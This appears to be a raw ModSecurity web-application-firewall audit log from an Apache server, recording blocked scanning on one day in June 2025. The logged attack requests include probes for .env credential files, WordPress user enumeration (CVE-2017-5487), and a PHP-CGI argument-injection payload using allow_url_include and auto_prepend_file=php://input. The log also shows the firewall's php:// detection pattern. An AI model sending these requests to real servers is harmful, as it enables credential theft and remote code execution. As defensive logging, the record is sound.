[severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749947848845357 919 (- - -) Stopwatch2: 1749947848845357 919; combined=391, p1=355, p2=0, p3=0, p4=0, p5=36, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8139e853-Z-- --e6273248-A-- [15/Jun/2025:07:37:35 +0700] aE4Vzz2YoubFl106kA3T2wAAAIU 103.236.140.4 33736 103.236.140.4 8181 --e6273248-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) Accept-Charset: utf-8 --e6273248-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6273248-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749947855860732 773 (- - -) Stopwatch2: 1749947855860732 773; combined=321, p1=285, p2=0, p3=0, p4=0, p5=35, sr=123, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6273248-Z-- --aee1d303-A-- [15/Jun/2025:08:17:45 +0700] aE4fOfGguMGNwgSGIMwjPQAAAAM 103.236.140.4 33866 103.236.140.4 8181 --aee1d303-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.199.85.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.199.85.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --aee1d303-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aee1d303-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749950265042215 3642 (- - -) Stopwatch2: 1749950265042215 3642; combined=1544, p1=517, p2=995, p3=0, p4=0, p5=32, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aee1d303-Z-- --b7407c59-A-- [15/Jun/2025:09:39:39 +0700] aE4yaz2YoubFl106kA3T_gAAAIw 103.236.140.4 34120 103.236.140.4 8181 --b7407c59-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.130.25.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.130.25.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b7407c59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7407c59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749955179705248 3336 (- - -) Stopwatch2: 1749955179705248 3336; combined=1425, p1=486, p2=906, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7407c59-Z-- --ebe0b215-A-- [15/Jun/2025:10:51:53 +0700] aE5DWbr7GPil_2h-MzYIWAAAAMM 103.236.140.4 34804 103.236.140.4 8181 --ebe0b215-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.134 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.134 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --ebe0b215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebe0b215-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749959513491275 869 (- - -) Stopwatch2: 1749959513491275 869; combined=366, p1=328, p2=0, p3=0, p4=0, p5=38, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebe0b215-Z-- --2346a77a-A-- [15/Jun/2025:10:51:54 +0700] aE5DWrr7GPil_2h-MzYIWQAAAMY 103.236.140.4 34806 103.236.140.4 8181 --2346a77a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.134 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.134 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --2346a77a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2346a77a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749959514989971 652 (- - -) Stopwatch2: 1749959514989971 652; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2346a77a-Z-- --ce219c74-A-- [15/Jun/2025:11:03:19 +0700] aE5GB_GguMGNwgSGIMwjmQAAAAE 103.236.140.4 34872 103.236.140.4 8181 --ce219c74-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 34.151.206.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 34.151.206.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ce219c74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce219c74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749960199391991 3012 (- - -) Stopwatch2: 1749960199391991 3012; combined=1295, p1=436, p2=829, p3=0, p4=0, p5=30, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce219c74-Z-- --21951a1d-A-- [15/Jun/2025:11:36:45 +0700] aE5N3T2YoubFl106kA3ULwAAAI0 103.236.140.4 35182 103.236.140.4 8181 --21951a1d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.18.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.18.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --21951a1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21951a1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749962205961687 840 (- - -) Stopwatch2: 1749962205961687 840; combined=352, p1=298, p2=0, p3=0, p4=0, p5=54, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21951a1d-Z-- --289fc422-A-- [15/Jun/2025:11:49:50 +0700] aE5Q7rr7GPil_2h-MzYIjQAAAMY 103.236.140.4 35248 103.236.140.4 8181 --289fc422-B-- GET /.env.backup HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-A600FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --289fc422-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --289fc422-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749962990861438 681 (- - -) Stopwatch2: 1749962990861438 681; combined=290, p1=260, p2=0, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --289fc422-Z-- --6267940d-A-- [15/Jun/2025:12:01:05 +0700] aE5TkYZIfYpKBvn-jB7KjQAAAFA 103.236.140.4 35350 103.236.140.4 8181 --6267940d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 35.216.200.253 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 35.216.200.253 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr --6267940d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6267940d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749963665720784 809 (- - -) Stopwatch2: 1749963665720784 809; combined=343, p1=261, p2=0, p3=0, p4=0, p5=82, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6267940d-Z-- --66be6d0b-A-- [15/Jun/2025:12:53:29 +0700] aE5f2T2YoubFl106kA3UkgAAAIQ 103.236.140.4 36954 103.236.140.4 8181 --66be6d0b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 118.179.89.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.179.89.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --66be6d0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66be6d0b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749966809266342 3056 (- - -) Stopwatch2: 1749966809266342 3056; combined=1289, p1=422, p2=838, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66be6d0b-Z-- --25905223-A-- [15/Jun/2025:13:02:12 +0700] aE5h5Lr7GPil_2h-MzYJUAAAAMA 103.236.140.4 37246 103.236.140.4 8181 --25905223-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.168.234.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.168.234.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --25905223-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25905223-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749967332343572 2801 (- - -) Stopwatch2: 1749967332343572 2801; combined=1266, p1=430, p2=806, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25905223-Z-- --57ac8e0c-A-- [15/Jun/2025:13:33:50 +0700] aE5pTj2YoubFl106kA3VNAAAAJY 103.236.140.4 37378 103.236.140.4 8181 --57ac8e0c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.22.220.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.22.220.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --57ac8e0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57ac8e0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749969230793393 3038 (- - -) Stopwatch2: 1749969230793393 3038; combined=1287, p1=420, p2=837, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57ac8e0c-Z-- --16b4dd55-A-- [15/Jun/2025:13:38:31 +0700] aE5qZ_GguMGNwgSGIMwkTAAAAAg 103.236.140.4 37558 103.236.140.4 8181 --16b4dd55-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 188.166.241.100 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 188.166.241.100 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --16b4dd55-C-- --16b4dd55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16b4dd55-E-- --16b4dd55-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749969511839964 4426 (- - -) Stopwatch2: 1749969511839964 4426; combined=2952, p1=552, p2=2363, p3=0, p4=0, p5=37, sr=167, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16b4dd55-Z-- --c6556c64-A-- [15/Jun/2025:13:42:51 +0700] aE5ra7r7GPil_2h-MzYJXQAAANA 103.236.140.4 38174 103.236.140.4 8181 --c6556c64-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36 Accept-Charset: utf-8 --c6556c64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6556c64-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749969771337015 815 (- - -) Stopwatch2: 1749969771337015 815; combined=337, p1=300, p2=0, p3=0, p4=0, p5=37, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6556c64-Z-- --2ba98936-A-- [15/Jun/2025:14:10:09 +0700] aE5x0T2YoubFl106kA3WNwAAAIs 103.236.140.4 38360 103.236.140.4 8181 --2ba98936-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 106.13.78.99 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 106.13.78.99 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --2ba98936-C-- --2ba98936-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ba98936-E-- --2ba98936-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749971409494276 5454 (- - -) Stopwatch2: 1749971409494276 5454; combined=3277, p1=562, p2=2676, p3=0, p4=0, p5=38, sr=91, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ba98936-Z-- --4cab7f00-A-- [15/Jun/2025:14:16:10 +0700] aE5zOrr7GPil_2h-MzYJcwAAAMQ 103.236.140.4 38478 103.236.140.4 8181 --4cab7f00-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 97.74.83.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 97.74.83.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4cab7f00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cab7f00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749971770530937 2233 (- - -) Stopwatch2: 1749971770530937 2233; combined=1146, p1=373, p2=745, p3=0, p4=0, p5=27, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cab7f00-Z-- --9288e518-A-- [15/Jun/2025:14:34:10 +0700] aE53cvGguMGNwgSGIMwkfQAAABc 103.236.140.4 38778 103.236.140.4 8181 --9288e518-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.6.1000 Chrome/30.0.1599.101 Safari/537.36 Accept-Charset: utf-8 --9288e518-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9288e518-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749972850036511 962 (- - -) Stopwatch2: 1749972850036511 962; combined=392, p1=350, p2=0, p3=0, p4=0, p5=42, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9288e518-Z-- --a156401f-A-- [15/Jun/2025:14:34:50 +0700] aE53moZIfYpKBvn-jB7MuwAAAEY 103.236.140.4 38782 103.236.140.4 8181 --a156401f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 Accept-Charset: utf-8 --a156401f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a156401f-H-- Message: Access denied with code 403 (phase 1). Matched 